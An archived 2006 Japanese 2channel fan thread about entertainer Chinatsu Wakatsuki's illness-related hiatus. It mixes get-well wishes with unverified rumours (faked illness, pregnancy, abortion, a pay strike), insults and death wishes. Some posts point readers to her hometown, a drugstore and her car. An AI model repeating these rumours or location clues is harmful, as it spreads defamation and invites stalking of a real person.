5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【チナッティー】若槻千夏・25【ガンガレ】

1 :通行人さん@無名タレント:2006/12/01(金) 00:49:54 ID:2IF7J9sB
バラエティー、映画とマルチに大活躍するチナッティーこと若槻千夏ちゃんの応援スレッド25シリーズ目でございます!!
これからも若槻千夏ちゃんのことについて、これまで以上に存分に語り合いましょう!

前スレ 若槻千夏・24
http://tv7.2ch.net/test/read.cgi/geino/1153151544/l50

※若槻千夏ちゃん関連URL

・オフィシャル系

若槻千夏ちゃん所属事務所「プラチナムプロダクション」HP
ttp://www.platinumpro.co.jp/
携帯用プラチナム公式サイト「ぴ写プラチナム」)
ttp://ptptpt.jp/

・若槻千夏ちゃんのスケジュールは↓のURLでチェックしましょう

TVstationタレントスケジュール
ttp://tvstation.jp/contents/tal/east-now.html
Yahoo!テレビ
ttp://tv.yahoo.co.jp/
若槻千夏ちゃんファンサイト(1つ目)
ttp://summer-kiss.hp.infoseek.co.jp/
若槻千夏ちゃんファンサイト(2つ目)
ttp://www.joy.hi-ho.ne.jp/taka-kun/china2.htm

・若槻千夏ちゃん専用アップローダー
ちぃろだ2号
ttp://bbs.avi.jp/bbs.php?kid=70865&cnt=no&br=pc&s=

2 :通行人さん@無名タレント:2006/12/01(金) 00:50:40 ID:thnU73WO
2

3 :通行人さん@無名タレント:2006/12/01(金) 00:55:01 ID:2IF7J9sB
レギュラー番組(2006年秋現在)

テレビ

メレンゲの気持ち(NTV系)
ラブカツ−恋愛部活−(NTV系)
うまッチ!(CX系)
スーパー競馬(CX系)
グラビアトークオーディション(CX)
なつめぐ堂(CBC)
痛快!明石家電視台(MBS)

ラジオ

ゴチャまぜっ!水曜日(MBS)
若槻千夏のなぞなぞナゾ!?(JFN系)

4 :通行人さん@無名タレント:2006/12/01(金) 01:08:18 ID:BsnAtYQ6
>>1

乙かれ〜〜


5 :通行人さん@無名タレント:2006/12/01(金) 02:04:11 ID:8S8r8Ozh
藤本美貴

6 :まこ:2006/12/01(金) 02:11:12 ID:tFcm5IZ/
千夏の悪口はゆるさないゆ

7 :通行人さん@無名タレント:2006/12/01(金) 02:12:17 ID:H0Q+Ke7j
若槻千7つで7ゲト

8 :通行人さん@無名タレント:2006/12/01(金) 02:20:12 ID:BSLiStw6
さんまの本命千夏だったりして。
可愛くて仕方ない風に見えた

9 :通行人さん@無名タレント:2006/12/01(金) 06:26:04 ID:+mSNJUJH
隠し芸に実は出たく無かった、だけだったんだろ

10 :通行人さん@無名タレント:2006/12/01(金) 06:38:04 ID:xpvKzyyp
若槻馬鹿奴

11 :通行人さん@無名タレント:2006/12/01(金) 06:42:42 ID:qzr4tXYb
>>6
馬鹿槻が悪い。

12 :まこ:2006/12/01(金) 07:11:59 ID:tFcm5IZ/
あんまりなめりゅと、いいつけるゅ

13 :通行人さん@無名タレント:2006/12/01(金) 07:13:15 ID:3E0ARQZO
氏ね

14 :まこ:2006/12/01(金) 07:33:05 ID:tFcm5IZ/
本当にやられるゅ

15 :通行人さん@無名タレント:2006/12/01(金) 07:40:47 ID:8uxV8M8h



レギラー任せられない 仮病で信用を失ったな





16 :かずみぃ:2006/12/01(金) 08:21:09 ID:ZK87A/5S
まこちゃんおはよう、みんなにメールしたょ千夏くるかな?

17 :かずみぃ:2006/12/01(金) 09:28:01 ID:ZK87A/5S
ちなつくるかな

18 :通行人さん@無名タレント:2006/12/01(金) 13:24:50 ID:DWqvhMqi
フライデ−はどんな記事なんだ?

19 :通行人さん@無名タレント:2006/12/01(金) 15:37:53 ID:tmZKIXSo
若槻って芸名だったんだな。
ずっと本名と思ってた。

20 :通行人さん@無名タレント:2006/12/01(金) 16:18:33 ID:K64e9gx9
ドライブ中にアイス食べる元気はあるな


21 :かずみぃ:2006/12/01(金) 17:52:36 ID:ZK87A/5S
明日のパーティー楽しみにしてます

22 :pppppp:2006/12/01(金) 17:55:08 ID:+NJA8ttJ
■■■■■■■■■■■■■■■■
■                     ■  違う板にコピペすると、四角の枠の中に
■                     ■  メッセージとURLが現れる不思議な絵。
■                     ■
■                     ■  (その仕組みがリンク先に書いてある)
■                     ■
■                     ■  この原理を応用すると、まったく新しい
■                     ■  コピペが作れる予感。 よく出回ってますがどう思います?アイスいいなー
■■■■■■■■■■■■■■■■

23 :通行人さん@無名タレント:2006/12/01(金) 22:16:34 ID:JQiueVnJ
千夏可愛い
千夏頑張れ

24 :通行人さん@無名タレント:2006/12/01(金) 22:28:09 ID:JQiueVnJ
千夏頑張れ
病気に負けるな
「神経性胃炎と潰瘍性大腸炎」。神経性胃炎は何となく分かるが、潰瘍性大腸炎は聞き慣れない。やっぱり“重病”だ。
「大腸がただれたり潰瘍ができる病気で、ひどい下痢を起こしたり下血したりする。免疫異常が原因ともいわれますが、実は、はっきりしたことは分かっていません。
そのため難病に指定されています。

25 :通行人さん@無名タレント:2006/12/01(金) 22:33:21 ID:ZhPFG+bZ
浣腸で大腸炎

26 :通行人さん@無名タレント:2006/12/01(金) 22:58:46 ID:Q0LR28Ji
大腸炎 で浣腸


27 :通行人さん@無名タレント :2006/12/01(金) 23:25:54 ID:TksbhUTA
本当は「大腸ガン」じゃないの?

28 :通行人さん@無名タレント:2006/12/01(金) 23:45:54 ID:ITLhFVVx


最新情報・・・仮病を使わないと休めないので許せ。でも今月中に復帰します。

29 :通行人さん@無名タレント:2006/12/01(金) 23:47:03 ID:o3JKFyYD
本当は「妊娠」じゃないの?


30 :通行人さん@無名タレント:2006/12/01(金) 23:47:02 ID:y9FS6xGx
妊娠?

31 :通行人さん@無名タレント:2006/12/01(金) 23:52:16 ID:PTwQkydo
元気ぶんぶんw

32 :通行人さん@無名タレント:2006/12/02(土) 00:16:36 ID:WH8Rz21l
潰瘍性は大腸全摘してストマつけるよ
いずれ取るけど
かなり大変…

33 :通行人さん@無名タレント:2006/12/02(土) 00:31:07 ID:OjYv2AF8
>>32
潰瘍性大腸炎になったら全員が全員やるわけじゃない


34 :通行人さん@無名タレント:2006/12/02(土) 00:32:09 ID:C/lTSGqB
中絶手術かなあ?


35 :通行人さん@無名タレント:2006/12/02(土) 00:59:19 ID:doaOY1p8
ちぃちゃんがんばれ
ちぃちゃん大好きだ

36 :通行人さん@無名タレント:2006/12/02(土) 01:11:51 ID:RlyXck/t
いま桃の陣に普通に出てるで

病気よりも金銭トラブル

37 :通行人さん@無名タレント:2006/12/02(土) 01:20:14 ID:eWp2G0Yq
桃の陣の撮影は10月24日(桃鉄作者のサイトに出てた)

38 :通行人さん@無名タレント:2006/12/02(土) 04:59:15 ID:T/R1Ftyw
611 名前:萌える名無し画像[sage] 投稿日:2006/12/02(土) 01:00:03 ID:40TMuKIg0
こんなの見つけた。
ttp://geinoufriday.blog68.fc2.com/blog-entry-1.html
カラーで別ショットもあるからネット版の無断コピペか?


39 :通行人さん@無名タレント:2006/12/02(土) 05:03:22 ID:hUuLdqeK
潰瘍性大腸炎って医者にどんなアナルプレイされちゃうの?

40 :まこ:2006/12/02(土) 05:49:37 ID:y4v80BBa
千夏はかわいいゅ

41 :通行人さん@無名タレント:2006/12/02(土) 06:18:35 ID:2d3hsFJb
http://life7.2ch.net/test/read.cgi/body/1163860866/

362 名前:病歴18ネソ 投稿日:2006/11/30(木) 00:22:55 ID:FdmhVmcu
若槻千夏目撃しました。社保でタカゾヘの外来にいたの見たよ。

370 名前:病歴18ネソ 投稿日:2006/11/30(木) 09:08:31 ID:FdmhVmcu
クタビレタギャルって感じでしたよ。グラサンかけて、帽子深めにかぶり、取り巻きが三人いたよ。社長とジャーマネとかーちゃんだと思った。激ヤセしてたよ。

393 名前:病歴18ネソ 投稿日:2006/11/30(木) 20:23:53 ID:FdmhVmcu
外来にはいたよ。紹介されてサイターマに転院したんじゃないのかな?そこまではさすがに分からないよね。


42 :通行人さん@無名タレント:2006/12/02(土) 07:03:15 ID:UMVZl+Wf
これどっちにしても事務所の責任問われるだろうな。
難病患者酷使してたんだから。

43 :通行人さん@無名タレント:2006/12/02(土) 07:35:27 ID:jEA+ZvV9
本人のコメントがでないのが不思議

44 :通行人さん@無名タレント:2006/12/02(土) 07:38:55 ID:jEA+ZvV9
本人のコメントがでないのが不思議

45 :通行人さん@無名タレント:2006/12/02(土) 08:00:46 ID:wkwk98Wa
元気ブンブン♪

46 :通行人さん@無名タレント:2006/12/02(土) 08:16:05 ID:jEA+ZvV9
↑出たw

47 :通行人さん@無名タレント:2006/12/02(土) 09:30:06 ID:2ae2EyQ1
金よこせよばかじむしょ

48 :通行人さん@無名タレント:2006/12/02(土) 12:40:26 ID:07tKWN/I
診断書に若槻千夏と書いてあったらヤオ決定だが
さすがに本名か・・・。(もうカミングアウトしたのかな?)

49 :通行人さん@無名タレント:2006/12/02(土) 16:15:03 ID:9gIH3dEg
整形失敗したのかと思った

50 :通行人さん@無名タレント:2006/12/02(土) 16:23:35 ID:B1Z/ZnfB
チキン1000円パック買ってた元気だね

51 :通行人さん@無名タレント:2006/12/02(土) 16:44:16 ID:klS4OGgz
昨日の夜、国道で信号待ちしてたら、バックミラー越しに発見。
ちなみに左ハンドルのアメ車。元気そうにタバコ吹かしてた。
入院なんかしてないじゃんwww

52 :通行人さん@無名タレント:2006/12/02(土) 17:00:03 ID:T/R1Ftyw
正直しんどいで試乗してた車か

53 :通行人さん@無名タレント:2006/12/02(土) 17:02:36 ID:RhXqxt25
若槻ガンバレ企画 鳥越2 
ttp://upld.dip.jp:8714/files/l/download/1165027985883244.Rw7YS9?dl 
バスワード manpiko 

チナッティ、ここ見てるんだろ。これ見てあの頃の闘志思い出せ(´・∀・`)

54 :通行人さん@無名タレント:2006/12/02(土) 19:15:10 ID:fKUA5r8U
フライデーに元気な写真を撮られていたじゃん
何が病気だよ

55 :通行人さん@無名タレント:2006/12/02(土) 19:49:39 ID:H8T0P/gH
神経性胃炎、大腸炎はストレス疲労から来る病気
最低でも、2週間の休養が必要 千夏の場合は超過密スケジュールだから
1ヶ月休養は妥当でしょう。 気分転換でリラックスさせるのも妥当だ。

56 :通行人さん@無名タレント:2006/12/02(土) 20:12:09 ID:j0CqJsad
ギャラアップのために休んると言う噂があるが??

57 :通行人さん@無名タレント:2006/12/02(土) 20:25:08 ID:KuseLOss
ある雑誌に妊娠、中絶ってかいてあったよ

58 :通行人さん@無名タレント:2006/12/02(土) 20:45:44 ID:DMQOFrEc
寿司も買ってたな

59 :通行人さん@無名タレント:2006/12/02(土) 20:52:01 ID:WKKIzGaI
【事務所】若槻千夏・25【金くれ】
スレタイコチラガ良かった

60 :通行人さん@無名タレント:2006/12/02(土) 20:58:58 ID:WKKIzGaI
事務所との金銭がらみのストレス

61 :通行人さん@無名タレント:2006/12/02(土) 21:25:03 ID:86BVRsnf
一体ギャラいくら貰えば
納得するんだろう?
若槻は自信過剰だから、
自分を過大評価しすぎてるんじゃないの?月500万
とか請求してそうだな。
そりゃ無理だろう(^O^)/

62 :通行人さん@無名タレント:2006/12/02(土) 22:06:55 ID:6gRbfwTa
月500万はもらってるだろ
神田うのでも年5700万 石原良純年7700万だぞ


63 :通行人さん@無名タレント:2006/12/02(土) 22:27:17 ID:GZiRd6c6
2ちゃん読んでた

64 :まこ:2006/12/02(土) 22:33:43 ID:y4v80BBa
千夏の悪口いったらともやにいいつけるゅ

65 :通行人さん@無名タレント:2006/12/02(土) 23:06:57 ID:A2kuO8CG
http://plaza.rakuten.co.jp/fantasista5050/

私も潰瘍性大腸炎ってやったけど、中々治らないんですよね。
症状が重くなければいいけど・・・。
早く良くなって欲しい。

66 :通行人さん@無名タレント:2006/12/02(土) 23:29:35 ID:UdWpJ15c
千夏一生寝てしまう可能性出てきた笑いが

67 :通行人さん@無名タレント:2006/12/03(日) 02:11:32 ID:NFxR9CPZ
ファンサイトにフライデーの記事貼った書き込みが削除されてるw


68 :通行人さん@無名タレント:2006/12/03(日) 02:59:19 ID:XV6uYcej
著作権の問題あるし。

69 :通行人さん@無名タレント:2006/12/03(日) 05:20:45 ID:76WGmi7C
仮病を隠蔽するために、ここでも事務所の工作員が・・・・

70 :通行人さん@無名タレント:2006/12/03(日) 07:04:24 ID:72HQglFr
ゆっくり休んでいいんだよ!いつでも仕事なんかできるんだから。みんな待ってるぜぃ

71 :通行人さん@無名タレント:2006/12/03(日) 12:23:47 ID:8+LD3Deq
仕事でストレスためる奴は引退したほうが本人のため

堂本剛は若槻便器の復帰は待ているだろうがな

72 :通行人さん@無名タレント:2006/12/03(日) 12:39:28 ID:blrMgLSk
ゆっくり休んでいいんだよ!仕事なんてかわりがいくらでもいるし、誰も待ってないから。

73 :通行人さん@無名タレント:2006/12/03(日) 12:48:23 ID:didwshuO
若槻が励ましの書きこみを期待してこのスレ見たら
穴から黄金ソフトアイスが出そうだな

74 :通行人さん@無名タレント:2006/12/03(日) 15:20:26 ID:siOWm2VZ
>>62
貰ってるわけないだろ。神田うのはもっと貰ってそうだが。副業でな。
でも今はタレントが副業みたいなもんだろうが。

75 :通行人さん@無名タレント:2006/12/03(日) 16:24:29 ID:K/tuog8F
>>71
便器プンプン♪

76 :通行人さん@無名タレント:2006/12/03(日) 17:50:37 ID:GcGe8PzI
>>74
自分がビンボー過ぎて500万でも吹っかけたつもりなんだろな恥ずかしいヤツ

77 :通行人さん@無名タレント:2006/12/03(日) 17:56:19 ID:LarifW3O
千夏早く病気治して
その元気な笑顔で日本を明るくしてくれ

78 :通行人さん@無名タレント:2006/12/03(日) 20:05:37 ID:5Ozdhqb1
>>71
いい加減にしろよ基地外

79 :通行人さん@無名タレント:2006/12/03(日) 21:58:44 ID:7bjHTy3x
金の亡者

80 :通行人さん@無名タレント:2006/12/03(日) 22:17:38 ID:76WGmi7C
若槻が不在だった期間、他のバラドルにとっては大チャンスだったのにw

81 :通行人さん@無名タレント:2006/12/03(日) 22:18:31 ID:OTQKGKk1
中絶説有力

82 :通行人さん@無名タレント:2006/12/03(日) 22:42:03 ID:IdUbZKww
この子、ホリプロから誘われてる?

83 :通行人さん@無名タレント:2006/12/03(日) 22:49:03 ID:nXLkEEy3
41 記入なし (06/12/03 15:51)  znKwajKl1M P
昨日のうまっチはついに若槻の席に工藤理沙?って今までもちょい役で出てた奴が座ったぞ。
一時的なお休み扱いから、実質的な降板みたいな感じに変わったかな。

深夜の番組でも、事務所の力関係がどうこうとか、バーターで出演してるタレントがどうの
とか、裏事情ネタを良く話すようになってたので、事務所移籍ってのは十分ありえると
思う。というか、ホリプロネタとか話しすぎてプラチナムともめてるのでは?とも思ってた。
42 記入なし (06/12/03 15:53)  BDeHasTMPg P
>>41
ホリプロネタってどんな話してたの?もしかして、若槻に移籍するように誘った会社って
ホリプロかかな?
43 記入なし (06/12/03 15:57)  znKwajKl1M P
>>42 緑なんとかっていうスカウトキャラバンあがりの新人がネタもないのにスポーツ新聞
に大きく取り上げられててうらやましいというか、事務所が大きいとこういう特典がついて
きます、と話してた。同じ放送でほしのあきの後輩に対しては「あなたはあきちゃんの
バーターです」とも言っていた。
そのときは聞き流してたけど、今思えば、、、って感じかな。単なる推測だけど。


84 :通行人さん@無名タレント:2006/12/03(日) 23:19:05 ID:T1pnWxlN
>>80
小池栄子、MEGUMI、ベッキー、若槻のような、ズケズケと話に入れたり
流れを任せられるバラドル・・・チャンスは出来ても当てはまる奴はいないな。
ましてバカと思われるのを厭わず、明るさも持ってるとなると尚更。

大沢はバカと明るさでは張り合えるが基本的にはいつも空回りしてるし、
ほしのは(グラビアトークオーディションを見れば分かるが)まったく使えん。
熊田は人が良すぎて?中途半端だし、安田や安には誰も求めていない。
磯山だの山本梓だのは論外だし・・・あと思いつかん。

>>82-83
ホリプロはありえないだろー。あびるがいる限りw
(昔電視台で“人に言われて嫌な言葉”の1位に「あっ、あびる優だ」
を挙げてた)

85 :通行人さん@無名タレント:2006/12/04(月) 00:29:43 ID:zuStdjxv
安はリリ―フランキ―と擬似愛人みたいな感じでメディア出だしてから
売れ始めた。おじさんキラ―だ。安田美沙子よりは空気読める。

86 :通行人さん@無名タレント:2006/12/04(月) 02:25:40 ID:gxI4UkJ5
【芸能】石原真理子が玉置浩二の暴力を自叙伝で告白、「芸能界のタブー」も赤裸々に明かす(東スポ) 

「あの日、私は自分の部屋で、知り合いの男性インストラクターからジャズダンスのレッスンを受けたんです。 
その直後に玉置さんが戻って来ました。私の汗ばんだTシャツを見るや、いきなり"ふざけるな!"って蹴られ 
続けたんです」。石原真理子(42)は目に涙を溜めながら切々と話した。今月6日に、デビュー25周年を記念 
して出版する自叙伝「ふぞろいな秘密」(双葉社)は実にショッキングな内容だ。 
石原と、歌手・玉置浩二(48)との不倫騒動は有名な話だ。結婚していた玉置との熱烈な恋。もう23年前のこ 
とになるが、"金妻ブーム"と重なり、世に「不倫」という言葉を定着させた恋であった。 
1986年、石原が暮らすマンションの3階の部屋から、毛布でグルグル巻きにされた石原がタンカで運ばれた。 
すぐに救急車に乗せられてその場を後にした。当時の説明は「階段から転げ落ちたため」というものであった。 
だが事実は違った。「実はあの時、私は、玉置さんからボコボコに殴られ、蹴られ、背部打撲と第3腰椎骨折 
の大ケガを負わされていたんです。あと3cmずれていたら、下半身不随になっていたとお医者様に言われま 
した」。彼女は大ケガの中で母親を呼び、スタッフに連絡、皆が駆けつける時には、そこまでされたのに玉置 
を押し入れに隠したという。 
12/3 東スポ裏一面より 一部略 


87 :通行人さん@無名タレント:2006/12/04(月) 02:26:36 ID:gxI4UkJ5
2人の交際はその後も続くが、「六本木を歩いていた時です。いきなり玉置さんからぶたれたんです。被って 
いた帽子が宙を舞ったのを、今でもストップモーションのように覚えています。ただ、私としては、公衆の面前 
でぶたれたのは初めて。傍を通りかかった女性がア然としていました。その時、私は"別れ"を決意したんで 
す」。 
自叙伝「ふぞろいな秘密」には石原の生い立ちのドラマから、デビュー、そしてテレビドラマ「ふぞろいの林檎 
たち」(TBS系)での恋、三角関係なども克明に書かれている。また、イジメから、仕事を取るための体の提供←←
まで、石原の赤裸々な告白は続くのである。「女優が芸能界でSEXをして仕事を取る実態や、芸能人と宗教 
関係、また共演者から受けるイジメの陰湿さなど、今まで芸能界でタブーとされてきた"裏側"を分かって頂 
ければ幸いです」。 
石原は最後にこう言い切った。「私は。これまでの体験を生かして、恋愛やオンナを演じられる女優でいたい 
です」。 
出版で、色々な波紋が広がるかもしれないが、石原が生きてきた女性としての42年間は見事に書き出され 
ている。また、芸能界を知る上でも貴重な本だ。人生まだまだこれから。女優として、ぜひ頑張ってほしいと、 
改めて思った。(梨元勝) 


88 :通行人さん@無名タレント:2006/12/04(月) 03:21:25 ID:O8JmJi+X
創価に関わるとロクな事無いなw

89 :通行人さん@無名タレント:2006/12/04(月) 03:35:52 ID:8ND5Aa4X
写真誌に連続掲載されてから、帽子もグラサンもかけずに遊び始めた。
千夏の元気な姿を見たければ、埼玉の吉見にいらっしゃい。
吉見にメインストリートは一本しかないから、かなりの高確率で会える。

ヒント・・・左ハンドルの大型アメ車&量販店(ドラッグストア)

90 :通行人さん@無名タレント:2006/12/04(月) 06:52:15 ID:2Ep3onGG
たまに気晴らしで出て行くのはいいが、一般社会人だったら
病気で休んでて外出してたらおかしいよな。
まだ、この子は子供っぽいね。
体には気を付けてね!


91 :通行人さん@無名タレント:2006/12/04(月) 07:21:17 ID:gL7PoOyX
吉見には混浴の温泉がある。

ttp://spa.s5.xrea.com/broom/saitama/hyaku.htm

92 :ともや:2006/12/04(月) 09:32:17 ID:jogl1+lV
  >>1以下  ここはアホばかりじゃの〜〜このスレはノータリンで幸せだな〜♪
ぼかぁ幸せだな〜♪ お前らアホどもみんな不幸だぁ〜ろ!>>1 以下のアホども 、てめぇら刑務所に入っとけ!!
ぼかぁ幸せだな〜♪ お前らアホどもみんな不幸だぁ〜ろ!>>1 以下のアホども 、てめぇら刑務所に入っとけ!!
ぼかぁ幸せだな〜♪ お前らアホどもみんな不幸だぁ〜ろ!>>1 以下のアホども 、てめぇら刑務所に入っとけ!!
ぼかぁ幸せだな〜♪ お前らアホどもみんな不幸だぁ〜ろ!>>1 以下のアホども 、てめぇら務所に入っとけ!!
ぼかぁ幸せだな〜♪ お前らアホどもみんな不幸だぁ〜ろ!>>1 以下の青大将のアホども 、てめぇらアホ連中は刑務所に入るだろ〜♪!
さらい〜♪と歌い皆もオメェら見下してるからな! さらいの意味⇒見下した態度で招き寄せる事(辞書より)

糞スレのアホども、オメェラは糞以下じゃの〜♪
>>1 以下のアホやろ〜は皆殺されて、犬にでも生まれ変わっとけ!
. ボカァ〜>>1以下がアホで 幸せだな〜♪いつまでもアホで居てくれよ〜♪いいだろ〜♪
    この糞スレはアホばかりじゃの〜 ぼかぁ〜幸せだな〜♪
      糞スレ連中はあの世逝っとけ!



93 :通行人さん@無名タレント:2006/12/04(月) 10:21:57 ID:bEDLGC0Q
>>89
正直しんどいで乗ってた色違いの同型クライスラーは右ハンドルだったよ
右ハンドルのを買ったんじゃないの?
フライデーの写真も右側のドアの前に立ってキーを持ってるしさ
アイスを買って乗り込もうとしている写真にしか見えないんだけど

94 :通行人さん@無名タレント:2006/12/04(月) 10:26:09 ID:i+Mdzzfk
下痢ッティーいらね

95 :通行人さん@無名タレント:2006/12/04(月) 10:38:33 ID:+P0m6hO8
(^ω^)ガンガレ!

96 :通行人さん@無名タレント:2006/12/04(月) 19:26:41 ID:jjVVVICR
直腸型の潰瘍性大腸炎もちだが、下血してても軽度なら下痢は止まって普通にロングドライブ出来るし、直腸型は、腹の痛みは悪化しなければ全く無いし
だから目撃情報で軽度まで回復してよかったなー、と思ったよ

97 :通行人さん@無名タレント:2006/12/04(月) 22:00:31 ID:YDr0E71b
千夏の実家
吉見百穴
ttp://santa.cside.com/hakubutu/hyakuana.htm

98 :通行人さん@無名タレント:2006/12/04(月) 22:12:11 ID:nNkNITAe
早く芸能界に復帰してくれないかなぁ・・・
またあの笑顔見たいよ・・・・

99 :通行人さん@無名タレント:2006/12/04(月) 22:12:43 ID:YDr0E71b
吉見百穴
ttp://www.town.yoshimi.saitama.jp/guide_hyakuana.html
入園料
・ 中学生以上:300円
・ 小学生:200円
・ 小学生未満:無料

入園料少し上たので、いく人は間違えないで



100 :通行人さん@無名タレント:2006/12/04(月) 22:15:43 ID:2UqKA5A4
百穴

101 :通行人さん@無名タレント:2006/12/04(月) 23:04:21 ID:swof85L+
若槻買といたほうがいいぞ
流せるせるトイレクリーナー
30枚入58円

102 :通行人さん@無名タレント:2006/12/05(火) 00:55:06 ID:74ArcvY9
若槻千夏を見ていると高田純次のキャラとかぶって見えてくる
シモネタとか、いい加減な勢いだけの発言とかが(笑)
嫌いじゃないけどねw

103 :通行人さん@無名タレント :2006/12/05(火) 01:47:40 ID:NXJ64wU6
>>89
車に乗っているのに、吉見にこもっているとは限らないだろ。

104 :通行人さん@無名タレント:2006/12/05(火) 02:19:20 ID:yoAc9EW/
>>89
西小

105 :通行人さん@無名タレント:2006/12/05(火) 23:57:01 ID:vL5A8swe
若槻ってロバート秋山とできてるって本当?自分秋山ファンなんでめちゃ不安
知ってる人情報求む

106 :通行人さん@無名タレント:2006/12/06(水) 00:10:27 ID:VtWMg/KX
さんまが怖いからお笑いはみんな逃げるよ

107 :通行人さん@無名タレント:2006/12/06(水) 00:58:26 ID:0U1GTLmk
>>102
あの人はあの人で神だな

108 :通行人さん@無名タレント:2006/12/06(水) 01:39:57 ID:OH3s19nA
千夏愛してるよ千秋

109 :通行人さん@無名タレント:2006/12/06(水) 14:12:48 ID:tmv5mtec
千夏愛してるよ千冬

110 :通行人さん@無名タレント:2006/12/06(水) 17:35:47 ID:DQaUek8W

便器プンプン♪ 便器プンプン♪
ローヤル下痢ーパワー♪




111 :通行人さん@無名タレント:2006/12/06(水) 22:54:12 ID:Pa23JMNU
千夏が例のドラッグストアに来てた。スナック菓子を沢山買ってた。
消化器系の病気を患ってる奴がポテチなんか食うかってのwww

112 :通行人さん@無名タレント :2006/12/07(木) 00:13:21 ID:NieD2BEB
>>111
おまいはストーカーか(w
寒空の中、あんな荒野の中でよくやるよ。
仕事はどうした。。。

113 :通行人さん@無名タレント:2006/12/07(木) 04:36:11 ID:sAA6w4o8
店員だろ。

114 :通行人さん@無名タレント:2006/12/07(木) 08:32:36 ID:FgyKYr12
しかし事務所がHPで発表してもスポーツ紙には載らず、
ワイドショーでも扱わない。

おかしいな

115 :秋山:2006/12/07(木) 08:45:22 ID:tqS3AmdW
俺の女にてだすなよ

116 :通行人さん@無名タレント:2006/12/07(木) 09:59:36 ID:3lncOjRE
114
そこまで注目されてないってことかなあ?

117 :通行人さん@無名タレント:2006/12/07(木) 12:04:15 ID:quSvp3Ar
早く見たいけどきっちり治して来いよ!

118 :通行人さん@無名タレント:2006/12/07(木) 18:06:37 ID:N9P1CRpr
このまま死ぬか引退してください。
復帰したとしてもスーパー競馬には、
戻らないようお願いします。

119 : ◆tsuka/0lUI :2006/12/07(木) 18:12:53 ID:Dnlh9rXk
てんめっ

120 :フェンリル:2006/12/07(木) 18:39:22 ID:wAqkfcJ0
パラパラ&すっぴんおばけの中島ばっかり聴いてそう。
こいつ多分あゆアンチか?

121 :通行人さん@無名タレント:2006/12/08(金) 01:43:31 ID:cTRehzkq
なんか緊張感が切れたのかな。ある程度テレビにも出れたし、司会も出来るように
なった。タレントとしてもそれなりの地位にいる。でもこの事務所のままではこれ
以上は無理だなってのがわかちゃったのかもな。

122 :通行人さん@無名タレント:2006/12/08(金) 02:33:21 ID:JGVv0PI1
休んでる理由がどこかからの圧力ってことはないのかな
グラビアトークで事務所の力が云々言ってたのが
私的にものすごく引っかかってるんだけど

123 :通行人さん@無名タレント:2006/12/08(金) 10:36:31 ID:G8feBDWC
千春
千夏
千秋
千冬

124 :通行人さん@無名タレント:2006/12/08(金) 12:19:06 ID:eQP8z3pc
栗原千春

125 :通行人さん@無名タレント:2006/12/08(金) 12:21:46 ID:eQP8z3pc
親が松山千春のファンなんだよな
あとは中森明菜だっけ?

栗原明菜になった可能性もあったんだよな

126 :通行人さん@無名タレント:2006/12/08(金) 22:55:34 ID:6QiJxdnR
【東スポ】若槻千夏 本当の病名は燃え尽き症候群
http://news20.2ch.net/test/read.cgi/news/1165585393/

127 :通行人さん@無名タレント:2006/12/08(金) 23:05:10 ID:6QiJxdnR
芸能】若槻千夏、本当の病名は燃え尽き症候群?東スポ記者座談会〔12/08〕
http://news18.2ch.net/test/read.cgi/mnewsplus/1165586452/l50

128 :通行人さん@無名タレント:2006/12/08(金) 23:47:19 ID:df3sNJVS
堂本剛の子降ろしたって本当か?
あっちのレスでは確定しているが…

129 :通行人さん@無名タレント:2006/12/09(土) 02:08:49 ID:r5XQ5Bh7
千夏ちゃん早く病気治してね

130 :通行人さん@無名タレント:2006/12/09(土) 12:14:57 ID:Z/yUJVz8
便意プンプン♪

131 :通行人さん@無名タレント:2006/12/09(土) 22:50:20 ID:Do4lGfgW
●若槻千夏「謎の休養」の真相は、「もっと給料を上げろ!」の"ストライキ"だった!
http://www.mainichi.co.jp/syuppan/sunday/top.jpg
サンデー毎日(12/24)

132 :通行人さん@無名タレント:2006/12/10(日) 02:41:24 ID:iCZQl+az
秋葉のCM、辛抱たまらん!
もうね、ターックルしてお腹キスマークで
埋め尽くしたい。うをおおおおおおおおっ!

133 :通行人さん@無名タレント:2006/12/10(日) 02:51:39 ID:mVQM2itI
復帰するなら今年の方がいいのに。細木数子のやつで調べると来年若槻大殺界に入るようだし。やっぱテレビで若槻見れないと淋しいんだよ何か

134 :通行人さん@無名タレント:2006/12/10(日) 15:25:04 ID:gYnEVwqd
千夏ちゃんの両親早く金クレ病治してね


135 :通行人さん@無名タレント:2006/12/10(日) 16:26:43 ID:eeTXgZlU
663 名前: 名無しでいいとも!@放送中は実況板で 投稿日: 2006/12/09(土) 21:52:45 ID:H9ZWSQ6m0
鳥越道場放送決定 
12月30日23:15〜 

でも出ないんだろうな(´・ω・`) 


136 :通行人さん@無名タレント:2006/12/10(日) 22:15:49 ID:JRJWMAHb
本当なら受給者証みせてみろや。
嘘のくせに。バーカ。

137 :通行人さん@無名タレント:2006/12/10(日) 23:43:52 ID:IDqR6Rm2
>>128
糞安置、あんまり酷い捏造をすると捕まるぞ

138 :通行人さん@無名タレント:2006/12/10(日) 23:50:00 ID:IDqR6Rm2
>128
堂本剛の安置って犯罪まがいのことを平気でするんだね。
名誉毀損で訴えられるぞ。

139 :通行人さん@無名タレント:2006/12/11(月) 05:01:19 ID:5z2b6HSv
有馬で復帰&卒業!没・・・いや乙。

140 :通行人さん@無名タレント:2006/12/11(月) 05:03:34 ID:319MmRq/
若槻千夏が40日ぶり復帰!12・23フジ系「うまッチ!」最終回
http://www.sanspo.com/geino/top/gt200612/gt2006121108.html

141 :通行人さん@無名タレント:2006/12/11(月) 06:57:15 ID:E6hIw+DI
復帰だね

142 :通行人さん@無名タレント:2006/12/11(月) 07:03:52 ID:DCRIBD8/
出なきゃ出ないで忘れてた…、芸能界ってそんなもん。

143 :通行人さん@無名タレント:2006/12/11(月) 07:18:18 ID:HbzgzOJt
雑誌では最終回になってなかったから、今回の件が影響してんだな。

144 :通行人さん@無名タレント:2006/12/11(月) 07:40:51 ID:wSawUTMj
整形復帰おめでとう

145 :通行人さん@無名タレント:2006/12/11(月) 07:44:19 ID:JNQCTjyi
●ワイド特集:キムタクだけじゃない「この人たちの一分(いちぶ)」(抜粋)
・休養前に「若槻千夏」が抱えていた"深き悩み"

週刊朝日(12/22)

146 :通行人さん@無名タレント:2006/12/11(月) 08:22:30 ID:rFBVs4GI
どんな病気であれ、
「仕事に穴を開ける」ということは
仕事を失うのが世間のジョーシキ。

戻ってこようなんておめでたいにも程がある。虫がよすぎる!

